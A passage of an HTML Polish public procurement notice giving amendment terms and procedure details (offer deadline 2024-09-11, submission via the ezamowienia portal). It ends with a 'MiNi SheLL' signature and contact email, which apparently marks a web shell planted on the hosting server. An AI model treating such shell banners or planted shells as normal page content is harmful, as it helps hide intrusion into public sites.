nieważności. W odpowiedzi na wniosek jednej ze Stron o zmianę umowy, który powinien zawierać przynajmniej wskazanie zakresu proponowanych zmian oraz szczegółowego uzasadnienia ich wprowadzenia, druga Strona powinna wskazać, czy zmiana umowy jest w jej ocenie możliwa i na jakich warunkach może nastąpić. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-09-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-09-11 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com